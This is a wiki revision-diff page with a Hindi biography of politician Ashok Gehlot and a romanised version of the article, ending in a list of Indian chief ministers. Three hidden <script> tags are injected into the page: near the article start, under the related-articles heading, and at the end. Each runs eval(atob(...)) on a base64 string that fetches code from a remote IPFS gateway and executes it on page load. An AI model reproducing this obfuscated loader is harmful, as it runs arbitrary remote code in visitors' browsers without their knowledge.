Difference between revisions of "अशोक गहलोत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " गरीब" to " ग़रीब")
Line 30: Line 30:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=अशोक गहलोत ने [[इन्दिरा गांधी]], [[राजीव गांधी]] तथा [[पी.वी. नरसिंह राव|पी.वी. नरसिम्‍हा राव]] के मंत्रीमण्‍डल में केन्‍द्रीय मंत्री के रूप में कार्य किया। वे तीन बार केन्‍द्रीय मंत्री बने।
+
|अन्य जानकारी=अशोक गहलोत ने [[इन्दिरा गांधी]], [[राजीव गांधी]] तथा [[पी.वी. नरसिंह राव|पी.वी. नरसिम्‍हा राव]] के मंत्रीमण्‍डल में केन्‍द्रीय मंत्री के रूप में कार्य किया।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन={{अद्यतन|17:09, 6 जनवरी 2014 (IST)}}
+
|अद्यतन=
}}
+
}}'''अशोक गहलोत''' ([[अंग्रेज़ी]]: ''Ashok Gehlot'', जन्म: [[3 मई]], [[1951]], [[जोधपुर]]) [[भारतीय राष्ट्रीय कांग्रेस]] प्रसिद्ध राजनीतिज्ञ और [[राजस्थान के मुख्यमंत्री]] हैं। वे अपनी सादगी और गांधीवादी मूल्‍यों के लिए पहचाने जाते हैं। वे तीन बार केन्‍द्रीय मंत्री बने। उन्‍होंने [[इंदिरा गांधी]], [[राजीव गांधी]] तथा पी. वी. नरसिम्‍हा राव के मंत्रिमण्‍डल में केन्‍द्रीय मंत्री के रूप में कार्य किया। वे तीन बार केन्‍द्रीय मंत्री बने। जब इंदिरा गांधी [[भारत]] की [[प्रधानमंत्री]] थीं, उस समय अशोक गहलोत मंत्रीमण्‍डल में पर्यटन और नागरिक उड्डयन उपमंत्री रहे। इसके बाद वह खेल उपमंत्री बनें। अशोक गहलोत ने भारतीय प्रतिनिधिमण्‍डल के सदस्‍य के रूप में विदेशों में भी भारत का प्रतिनिधित्‍व किया है।
'''अशोक गहलोत''' ([[अंग्रेज़ी]]: ''Ashok Gehlot'', जन्म: [[3 मई]], [[1951]]) प्रसिद्ध राजनीतिज्ञ और [[राजस्थान के मुख्यमंत्री|राजस्थान के पूर्व मुख्यमंत्री]] हैं। अपनी सादगी और गांधीवादी मूल्‍यों के लिए पहचाने जाने वाले अशोक गहलोत का जन्‍म [[3 मई]] [[1951]] को [[जोधपुर]], [[राजस्थान]] में हुआ। लक्ष्‍मण सिंह गहलोत के घर जन्‍मे अशोक गहलोत ने [[विज्ञान]] और क़ानून में स्‍नातक डिग्री प्राप्‍त की तथा अर्थशास्‍त्र विषय लेकर स्‍नातकोत्‍तर डिग्री प्राप्‍त की। अशोक गहलोत का विवाह 27 नवम्‍बर, 1977 को श्रीमती सुनीता गहलोत के साथ हुआ। अशोक गहलोत के एक पुत्र (वैभव गहलोत) और एक पुत्री (सोनिया गहलोत) हैं। वे लोगों की पीड़ा और दु:ख- दर्द जानने के लिए उनसे सीधी मुलाकात करते हैं।
+
==परिचय==
 +
अशोक गहलोत का जन्‍म [[3 मई]], [[1951]] को [[जोधपुर]], [[राजस्थान]] में हुआ। लक्ष्‍मण सिंह गहलोत के घर जन्‍मे अशोक गहलोत ने [[विज्ञान]] और क़ानून में स्‍नातक डिग्री प्राप्‍त की तथा अर्थशास्‍त्र विषय लेकर स्‍नातकोत्‍तर डिग्री प्राप्‍त की। उनका [[विवाह]] [[27 नवम्‍बर]], [[1977]] को सुनीता गहलोत के साथ हुआ। उनके एक पुत्र (वैभव गहलोत) और एक पुत्री (सोनिया गहलोत) हैं। अशोक गहलोत लोगों की पीड़ा और दु:ख- दर्द जानने के लिए उनसे सीधी मुलाकात करते हैं।
 
==राजनीतिक परिचय==
 
==राजनीतिक परिचय==
 
विद्यार्थी जीवन से ही राजनीति और [[समाजसेवा]] में सक्रिय रहे अशोक गहलोत 7वीं [[लोकसभा]] (1980-84) के लिए वर्ष 1980 में पहली बार जोधपुर संसदीय क्षेत्र से निर्वाचित हुए। अशोक गहलोत एक कद्दावर नेता हैं तथा उन्‍होंने जोधपुर संसदीय क्षेत्र का 8वीं लोकसभा (1984-1989), 10वीं लोकसभा (1991-96), 11वीं लोकसभा (1996-98) तथा 12वीं लोकसभा (1998-1999) में भी प्रतिनिधित्‍व किया। सरदारपुरा (जोधपुर) विधानसभा क्षेत्र से निर्वाचित होने के बाद अशोक गहलोत फरवरी, 1999 में 11वीं राजस्थान विधानसभा के सदस्‍य बने। प्रदेश की जनता में लोकप्रिय अशोक गहलोत पुन: इसी विधानसभा क्षेत्र से 12वीं राजस्थान विधानसभा के लिए 4 दिसंबर 2003 को निर्वाचित हुए तथा 13वीं राजस्थान [[विधानसभा]] के लिए [[8 दिसंबर]] [[2008]] को सरदारपुरा विधानसभा क्षेत्र से ही दुबारा निर्वाचित हुए।
 
विद्यार्थी जीवन से ही राजनीति और [[समाजसेवा]] में सक्रिय रहे अशोक गहलोत 7वीं [[लोकसभा]] (1980-84) के लिए वर्ष 1980 में पहली बार जोधपुर संसदीय क्षेत्र से निर्वाचित हुए। अशोक गहलोत एक कद्दावर नेता हैं तथा उन्‍होंने जोधपुर संसदीय क्षेत्र का 8वीं लोकसभा (1984-1989), 10वीं लोकसभा (1991-96), 11वीं लोकसभा (1996-98) तथा 12वीं लोकसभा (1998-1999) में भी प्रतिनिधित्‍व किया। सरदारपुरा (जोधपुर) विधानसभा क्षेत्र से निर्वाचित होने के बाद अशोक गहलोत फरवरी, 1999 में 11वीं राजस्थान विधानसभा के सदस्‍य बने। प्रदेश की जनता में लोकप्रिय अशोक गहलोत पुन: इसी विधानसभा क्षेत्र से 12वीं राजस्थान विधानसभा के लिए 4 दिसंबर 2003 को निर्वाचित हुए तथा 13वीं राजस्थान [[विधानसभा]] के लिए [[8 दिसंबर]] [[2008]] को सरदारपुरा विधानसभा क्षेत्र से ही दुबारा निर्वाचित हुए।
Line 43: Line 44:
 
====केंद्रीय मंत्री====
 
====केंद्रीय मंत्री====
 
अशोक गहलोत ने [[इन्दिरा गांधी]], [[राजीव गांधी]] तथा [[पी.वी. नरसिंह राव|पी.वी. नरसिम्‍हा राव]] के मंत्रीमण्‍डल में केन्‍द्रीय मंत्री के रूप में कार्य किया। वे तीन बार केन्‍द्रीय मंत्री बने। जब श्रीमती इन्दिरा गांधी [[भारत]] की प्रधानमंत्री थीं उस समय अशोक गहलोत [[2 सितम्बर]], [[1982]] से [[7 फरवरी]], [[1984]] की अवधि में श्रीमती इन्दिरा गांधी के मंत्रीमण्‍डल में पर्यटन और नागरिक उड्डयन उपमंत्री रहे। इसके बाद अशोक गहलोत खेल उपमंत्री बनें । उन्‍होंने 7 फरवरी, 1984 से 31 अक्‍टूबर 1984 की अवधि में खेल मंत्रालय में कार्य किया तथा पुन: 12 नवम्‍बर, 1984 से 31 दिसम्बर, 1984 की अवधि में इसी मंत्रालय में कार्य किया। उनकी पारदर्शी कार्यशैली तथा प्रत्‍येक विषय-वस्‍तु को गहराई से जानने की लगन के कारण श्रीमती इन्दिरा गांधी और श्री राजीव गांधी जैसे नेता उनकी भूरि-भूरि प्रशंसा करते थे। उनकी इस कार्यशैली को देखते हुए उन्‍हें केन्‍द्र सरकार में राज्‍य मंत्री बनाया गया। [[31 दिसम्बर]], [[1984]] से [[26 सितम्बर]], [[1985]] की अवधि में अशोक गहलोत ने केन्‍द्रीय पर्यटन और नागरिक उड्डयन राज्‍य मंत्री के रूप में कार्य किया। इसके पश्‍चात् उन्‍हें केन्‍द्रीय कपड़ा राज्‍य मंत्री बनाया गया। यह मंत्रालय पूर्व [[प्रधानमंत्री]] के पास था तथा अशोक गहलोत को इसका स्‍वतंत्र प्रभार दिया गया। अशोक गहलोत इस मंत्रालय के 21 जून, 1991 से 18 जनवरी, 1993 तक मंत्री रहे ।
 
अशोक गहलोत ने [[इन्दिरा गांधी]], [[राजीव गांधी]] तथा [[पी.वी. नरसिंह राव|पी.वी. नरसिम्‍हा राव]] के मंत्रीमण्‍डल में केन्‍द्रीय मंत्री के रूप में कार्य किया। वे तीन बार केन्‍द्रीय मंत्री बने। जब श्रीमती इन्दिरा गांधी [[भारत]] की प्रधानमंत्री थीं उस समय अशोक गहलोत [[2 सितम्बर]], [[1982]] से [[7 फरवरी]], [[1984]] की अवधि में श्रीमती इन्दिरा गांधी के मंत्रीमण्‍डल में पर्यटन और नागरिक उड्डयन उपमंत्री रहे। इसके बाद अशोक गहलोत खेल उपमंत्री बनें । उन्‍होंने 7 फरवरी, 1984 से 31 अक्‍टूबर 1984 की अवधि में खेल मंत्रालय में कार्य किया तथा पुन: 12 नवम्‍बर, 1984 से 31 दिसम्बर, 1984 की अवधि में इसी मंत्रालय में कार्य किया। उनकी पारदर्शी कार्यशैली तथा प्रत्‍येक विषय-वस्‍तु को गहराई से जानने की लगन के कारण श्रीमती इन्दिरा गांधी और श्री राजीव गांधी जैसे नेता उनकी भूरि-भूरि प्रशंसा करते थे। उनकी इस कार्यशैली को देखते हुए उन्‍हें केन्‍द्र सरकार में राज्‍य मंत्री बनाया गया। [[31 दिसम्बर]], [[1984]] से [[26 सितम्बर]], [[1985]] की अवधि में अशोक गहलोत ने केन्‍द्रीय पर्यटन और नागरिक उड्डयन राज्‍य मंत्री के रूप में कार्य किया। इसके पश्‍चात् उन्‍हें केन्‍द्रीय कपड़ा राज्‍य मंत्री बनाया गया। यह मंत्रालय पूर्व [[प्रधानमंत्री]] के पास था तथा अशोक गहलोत को इसका स्‍वतंत्र प्रभार दिया गया। अशोक गहलोत इस मंत्रालय के 21 जून, 1991 से 18 जनवरी, 1993 तक मंत्री रहे ।
====मुख्यमंत्री====
+
==मुख्यमंत्री==
अशोक गहलोत 1 दिसंबर 1998 से  8 दिसंबर 2003 तक [[राजस्थान के मुख्यमंत्री]] रहे। उनका यह कार्यकाल अन्‍य महत्‍वपूर्ण उपलब्धियों के अलावा अभूतपूर्व सूखा प्रबन्‍धन, विद्युत उत्‍पादन, संसाधनों का विकास, रोज़गार सृजन, औद्योगिक और पर्यटन विकास, कुशल वित्‍तीय प्रबन्‍धन और सुशासन के लिए जाना जाता है। [[मुख्‍यमंत्री]] के रूप में अशोक गहलोत के पहले कार्यकाल के दौरान [[राजस्थान]] में इस सदी का भयंकार अकाल पड़ा। उन्‍होंने अत्‍यन्‍त ही प्रभावी और कुशल ढ़ंग से अकाल प्रबन्‍धन का कार्य किया। उस समय [[अकाल]] प्रभावित लोगों के पास इतना अनाज पहुंचाया गया था जितना अनाज ये लोग शायद अपनी फसलों से भी प्राप्‍त नहीं कर सकते थे। प्रतिपक्ष भी खाद्यान्‍न और चारे की अनुपलब्‍धता के सम्‍बन्‍ध में सरकार की तरफ अंगुली तक नहीं उठा सके क्‍योंकि अशोक गहलोत ने व्‍यक्तिगत रूप से अकाल राहत कार्यों की मॉनिटरिंग की थी। अशोक गहलोत को ग़रीब की पीड़ा और उसके दु:ख दर्द की अनुभूति करने वाले राजनेता के रूप में जाना जाता है। उन्‍होंने 'पानी बचाओ, बिजली बचाओ, सबको पढ़ाओ' का नारा दिया जिसे राज्‍य की जनता ने पूर्ण मनोयोग से अंगीकार किया। अशोक गहलोत को 13 दिसम्बर, 2008 को दूसरी बार राजस्थान के मुख्‍यमंत्री बने और [[12 दिसंबर]] [[2013]] तक पदासीन रहे।
+
अशोक गहलोत 1 दिसंबर 1998 से  8 दिसंबर 2003 तक [[राजस्थान के मुख्यमंत्री]] रहे। उनका यह कार्यकाल अन्‍य महत्‍वपूर्ण उपलब्धियों के अलावा अभूतपूर्व सूखा प्रबन्‍धन, विद्युत उत्‍पादन, संसाधनों का विकास, रोज़गार सृजन, औद्योगिक और पर्यटन विकास, कुशल वित्‍तीय प्रबन्‍धन और सुशासन के लिए जाना जाता है। [[मुख्‍यमंत्री]] के रूप में अशोक गहलोत के पहले कार्यकाल के दौरान [[राजस्थान]] में इस सदी का भयंकार अकाल पड़ा। उन्‍होंने अत्‍यन्‍त ही प्रभावी और कुशल ढ़ंग से अकाल प्रबन्‍धन का कार्य किया। उस समय [[अकाल]] प्रभावित लोगों के पास इतना अनाज पहुंचाया गया था जितना अनाज ये लोग शायद अपनी फसलों से भी प्राप्‍त नहीं कर सकते थे। प्रतिपक्ष भी खाद्यान्‍न और चारे की अनुपलब्‍धता के सम्‍बन्‍ध में सरकार की तरफ अंगुली तक नहीं उठा सके क्‍योंकि अशोक गहलोत ने व्‍यक्तिगत रूप से अकाल राहत कार्यों की मॉनिटरिंग की थी। अशोक गहलोत को ग़रीब की पीड़ा और उसके दु:ख दर्द की अनुभूति करने वाले राजनेता के रूप में जाना जाता है। उन्‍होंने 'पानी बचाओ, बिजली बचाओ, सबको पढ़ाओ' का नारा दिया जिसे राज्‍य की जनता ने पूर्ण मनोयोग से अंगीकार किया। अशोक गहलोत को [[12 दिसम्बर]], [[2008]] को दूसरी बार राजस्थान के मुख्‍यमंत्री बने और [[13 दिसंबर]], [[2013]] तक पदासीन रहे। [[17 दिसंबर]], [[2018]] को वह तीसरी बार राज्य के मुख्यमंत्री बने हैं।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
Line 52: Line 53:
 
*[http://www.cmo.rajasthan.gov.in/Profilecm.aspx अशोक गहलोत (आधिकारिक वेबसाइट)]
 
*[http://www.cmo.rajasthan.gov.in/Profilecm.aspx अशोक गहलोत (आधिकारिक वेबसाइट)]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{राजस्थान के मुख्यमंत्री}}
+
{{राजस्थान के मुख्यमंत्री}}{{सातवीं लोकसभा सांसद}}{{आठवीं लोकसभा सांसद}}{{दसवीं लोकसभा सांसद}}{{ग्यारहवीं लोकसभा सांसद}}{{बारहवीं लोकसभा सांसद}}{{भारतीय राज्यों के मुख्यमंत्री}}
[[Category:राजस्थान के मुख्यमंत्री]][[Category:सातवीं लोकसभा सांसद]][[Category:आठवीं लोकसभा सांसद]][[Category:दसवीं लोकसभा सांसद]][[Category:ग्यारहवीं लोकसभा सांसद]][[Category:बारहवीं लोकसभा सांसद]][[Category:राजस्थान के लोकसभा सांसद]][[Category:मुख्यमंत्री]]
+
[[Category:राजस्थान]][[Category:मुख्यमंत्री]][[Category:राजस्थान के मुख्यमंत्री]][[Category:भारतीय राज्यों के मुख्यमंत्रियों की सूची]][[Category:राजनीतिज्ञ]][[Category:राजनेता]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:जीवनी साहित्य]][[Category:राजनीति कोश]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
[[Category:राजनीतिज्ञ]][[Category:लोकसभा सांसद]][[Category:लोकसभा]]
+
[[Category:सातवीं लोकसभा सांसद]][[Category:आठवीं लोकसभा सांसद]][[Category:दसवीं लोकसभा सांसद]][[Category:ग्यारहवीं लोकसभा सांसद]][[Category:बारहवीं लोकसभा सांसद]][[Category:राजस्थान के लोकसभा सांसद]][[Category:लोकसभा सांसद]][[Category:चुनाव अद्यतन]]
[[Category:राजनीति कोश]][[Category:चरित कोश]][[Category:चुनाव अद्यतन]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 09:52, 24 November 2020

ashok gahalot
poora nam ashok gahalot
janm 3 mee, 1951
janm bhoomi jodhapur, rajasthan
abhibhavak lakshh‍man sianh gahalot
pati/patni sunita gahalot
santan putr- vaibhav gahalot, putri- soniya gahalot
nagarikata bharatiy
parti bharatiy rashtriy kaangres
pad rajasthan ke poorv mukhyamantri (do bar)
kary kal 1 disanbar 1998 se 8 disanbar 2003 tak aur 13 disanbar 2008 se 12 disanbar 2013 tak
shiksha vakalat, sh‍natakoth‍tar (arthashash‍tr)
any janakari ashok gahalot ne indira gaandhi, rajiv gaandhi tatha pi.vi. narasimh‍ha rav ke mantrimanh‍dal mean kenh‍driy mantri ke roop mean kary kiya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>ashok gahalot (aangrezi: Ashok Gehlot, janm: 3 mee, 1951, jodhapur) bharatiy rashtriy kaangres prasiddh rajanitijn aur rajasthan ke mukhyamantri haian. ve apani sadagi aur gaandhivadi moolh‍yoan ke lie pahachane jate haian. ve tin bar kenh‍driy mantri bane. unh‍hoanne iandira gaandhi, rajiv gaandhi tatha pi. vi. narasimh‍ha rav ke mantrimanh‍dal mean kenh‍driy mantri ke roop mean kary kiya. ve tin bar kenh‍driy mantri bane. jab iandira gaandhi bharat ki pradhanamantri thian, us samay ashok gahalot mantrimanh‍dal mean paryatan aur nagarik uddayan upamantri rahe. isake bad vah khel upamantri banean. ashok gahalot ne bharatiy pratinidhimanh‍dal ke sadash‍y ke roop mean videshoan mean bhi bharat ka pratinidhith‍v kiya hai.

parichay

ashok gahalot ka janh‍m 3 mee, 1951 ko jodhapur, rajasthan mean hua. lakshh‍man sianh gahalot ke ghar janh‍me ashok gahalot ne vijnan aur qanoon mean sh‍natak digri praph‍t ki tatha arthashash‍tr vishay lekar sh‍natakoth‍tar digri praph‍t ki. unaka vivah 27 navamh‍bar, 1977 ko sunita gahalot ke sath hua. unake ek putr (vaibhav gahalot) aur ek putri (soniya gahalot) haian. ashok gahalot logoan ki pi da aur du:kh- dard janane ke lie unase sidhi mulakat karate haian.

rajanitik parichay

vidyarthi jivan se hi rajaniti aur samajaseva mean sakriy rahe ashok gahalot 7vian lokasabha (1980-84) ke lie varsh 1980 mean pahali bar jodhapur sansadiy kshetr se nirvachit hue. ashok gahalot ek kaddavar neta haian tatha unh‍hoanne jodhapur sansadiy kshetr ka 8vian lokasabha (1984-1989), 10vian lokasabha (1991-96), 11vian lokasabha (1996-98) tatha 12vian lokasabha (1998-1999) mean bhi pratinidhith‍v kiya. saradarapura (jodhapur) vidhanasabha kshetr se nirvachit hone ke bad ashok gahalot pharavari, 1999 mean 11vian rajasthan vidhanasabha ke sadash‍y bane. pradesh ki janata mean lokapriy ashok gahalot pun: isi vidhanasabha kshetr se 12vian rajasthan vidhanasabha ke lie 4 disanbar 2003 ko nirvachit hue tatha 13vian rajasthan vidhanasabha ke lie 8 disanbar 2008 ko saradarapura vidhanasabha kshetr se hi dubara nirvachit hue.

kaangres kameti ke adhh‍yaksh

ashok gahalot ko 3 bar pradesh kaangres kameti ka adhh‍yaksh rahane ka gaurav praph‍t hua hai. pahali bar ashok gahalot 34 varsh ki yuva avash‍tha mean hi rajasthan pradesh kaangres kameti ke adhh‍yaksh ban gaye the. rajasthan pradesh kaangres kameti ke adhh‍yaksh ke roop mean unaka pahala karyakal sitambar, 1985 se joon, 1989 ki avadhi ke bich mean raha. 1 disambar, 1994 se joon, 1997 tak dvitiy bar v joon, 1997 se 14 aprail, 1999 tak tritiy bar ve pun: rajasthan pradesh kaangres kameti ke adhh‍yaksh pad par rahe.

sadasyata

varsh 1980 se 1982 ke bich ashok gahalot pablik ekaunh‍ts kameti (lokasabha) ke sadash‍y rahe. ashok gahalot sanchar mantralay ki paramarshadatri samiti (10vian lokasabha) ke sadash‍y bhi rah chuke haian. unh‍hoanne rel mantralay ki sh‍thaee samiti (10vian aur 11vian lokasabha) ke sadash‍y ke roop mean kary kiya. isake alava ashok gahalot videsh mantralay se samh‍baddh salahakar samiti (11vian lokasabha) ke sadash‍y bhi rahe.

keandriy mantri

ashok gahalot ne indira gaandhi, rajiv gaandhi tatha pi.vi. narasimh‍ha rav ke mantrimanh‍dal mean kenh‍driy mantri ke roop mean kary kiya. ve tin bar kenh‍driy mantri bane. jab shrimati indira gaandhi bharat ki pradhanamantri thian us samay ashok gahalot 2 sitambar, 1982 se 7 pharavari, 1984 ki avadhi mean shrimati indira gaandhi ke mantrimanh‍dal mean paryatan aur nagarik uddayan upamantri rahe. isake bad ashok gahalot khel upamantri banean . unh‍hoanne 7 pharavari, 1984 se 31 akh‍toobar 1984 ki avadhi mean khel mantralay mean kary kiya tatha pun: 12 navamh‍bar, 1984 se 31 disambar, 1984 ki avadhi mean isi mantralay mean kary kiya. unaki paradarshi karyashaili tatha prath‍yek vishay-vash‍tu ko gaharaee se janane ki lagan ke karan shrimati indira gaandhi aur shri rajiv gaandhi jaise neta unaki bhoori-bhoori prashansa karate the. unaki is karyashaili ko dekhate hue unh‍hean kenh‍dr sarakar mean rajh‍y mantri banaya gaya. 31 disambar, 1984 se 26 sitambar, 1985 ki avadhi mean ashok gahalot ne kenh‍driy paryatan aur nagarik uddayan rajh‍y mantri ke roop mean kary kiya. isake pashh‍chath unh‍hean kenh‍driy kap da rajh‍y mantri banaya gaya. yah mantralay poorv pradhanamantri ke pas tha tatha ashok gahalot ko isaka sh‍vatantr prabhar diya gaya. ashok gahalot is mantralay ke 21 joon, 1991 se 18 janavari, 1993 tak mantri rahe .

mukhyamantri

ashok gahalot 1 disanbar 1998 se 8 disanbar 2003 tak rajasthan ke mukhyamantri rahe. unaka yah karyakal anh‍y mahath‍vapoorn upalabdhiyoan ke alava abhootapoorv sookha prabanh‍dhan, vidyut uth‍padan, sansadhanoan ka vikas, rozagar srijan, audyogik aur paryatan vikas, kushal vith‍tiy prabanh‍dhan aur sushasan ke lie jana jata hai. mukhh‍yamantri ke roop mean ashok gahalot ke pahale karyakal ke dauran rajasthan mean is sadi ka bhayankar akal p da. unh‍hoanne ath‍yanh‍t hi prabhavi aur kushal dhang se akal prabanh‍dhan ka kary kiya. us samay akal prabhavit logoan ke pas itana anaj pahuanchaya gaya tha jitana anaj ye log shayad apani phasaloan se bhi praph‍t nahian kar sakate the. pratipaksh bhi khadyanh‍n aur chare ki anupalabh‍dhata ke samh‍banh‍dh mean sarakar ki taraph aanguli tak nahian utha sake kh‍yoanki ashok gahalot ne vh‍yaktigat roop se akal rahat karyoan ki m aaunitariang ki thi. ashok gahalot ko garib ki pi da aur usake du:kh dard ki anubhooti karane vale rajaneta ke roop mean jana jata hai. unh‍hoanne 'pani bachao, bijali bachao, sabako padhao' ka nara diya jise rajh‍y ki janata ne poorn manoyog se aangikar kiya. ashok gahalot ko 12 disambar, 2008 ko doosari bar rajasthan ke mukhh‍yamantri bane aur 13 disanbar, 2013 tak padasin rahe. 17 disanbar, 2018 ko vah tisari bar rajy ke mukhyamantri bane haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bharatiy rajyoan mean padasth mukhyamantri
kramaank rajy mukhyamantri tasvir parti padabhar grahan
1. arunachal pradesh pema khaandoo 80px|center bhajapa 17 julaee, 2016
2. asam himanta bisva sarama 80px|center bhajapa 10 mee, 2021
3. aandhr pradesh vaee es jaganamohan reddi 80px|center vaeeesar kaangres parti 30 mee, 2019
4. uttar pradesh yogi adityanath 80px|center bhajapa 19 march, 2017
5. uttarakhand pushkar sianh dhami 80px|center bhajapa 4 julaee, 2021
6. odisha navin patanayak 80px|center bijoo janata dal 5 march, 2000
7. karnatak siddharamaiya 80px|center bharatiy rashtriy kaangres 20 mee, 2023
8. keral pinaraee vijayan 80px|center marksavadi kamyunist parti 25 mee, 2016
9. gujarat bhoopendr patel 80px|center bhajapa 12 sitambar, 2021
10. gova pramod savant 80px|center bhajapa 19 march, 2019
11. chhattisagadh vishnu dev say 80px|center bharatiy janata parti 13 disambar, 2023
12. jammoo-kashmir rikt (rajyapal shasan) lagoo nahian 20 joon, 2018
13. jharakhand hemant soren 80px|center jharakhand mukti morcha 29 disambar, 2019
14. tamil nadu em. ke. stalin 80px|center dravi d munnetr k dagam 7 mee, 2021
15. tripura manik saha 80px|center bhajapa 15 mee, 2022
16. telangana anumula revant reddi 80px|center bharatiy rashtriy kaangres 7 disanbar, 2023
17. dilli aravind kejarival 80px|center ap 14 faravari, 2015
18. nagalaind nephiyoo riyo 80px|center enadipipi 8 march, 2018
19. panjab bhagavant man 80px|center am adami parti 16 march, 2022
20. pashchim bangal mamata banarji 80px|center trinamool kaangres 20 mee, 2011
21. puducheri en. rangasvami 80px|center kaangres 7 mee, 2021
22. bihar nitish kumar 80px|center jadayoo 27 julaee, 2017
23. manipur en. biren sianh 80px|center bhajapa 15 march, 2017
24. madhy pradesh mohan yadav 80px|center bhajapa 13 disanbar, 2023
25. maharashtr ekanath shiande 80px|center shiv sena 30 joon, 2022
26. mizoram laladuhoma 80px|center joram pipals moovameant 8 disambar, 2023
27. meghalay k aaunarad sangama 80px|center enapipi 6 march, 2018
28. rajasthan bhajan lal sharma 80px|center bharatiy janata parti 15 disambar, 2023
29. sikkim prem sianh tamaang 80px|center sikkim kraantikari morcha 27 mee, 2019
30. hariyana nayab sianh saini 80px|center bhajapa 12 march, 2024
31. himachal pradesh sukhaviandar sianh sukkhoo 80px|center bharatiy rashtriy kaangres 11 disambar, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>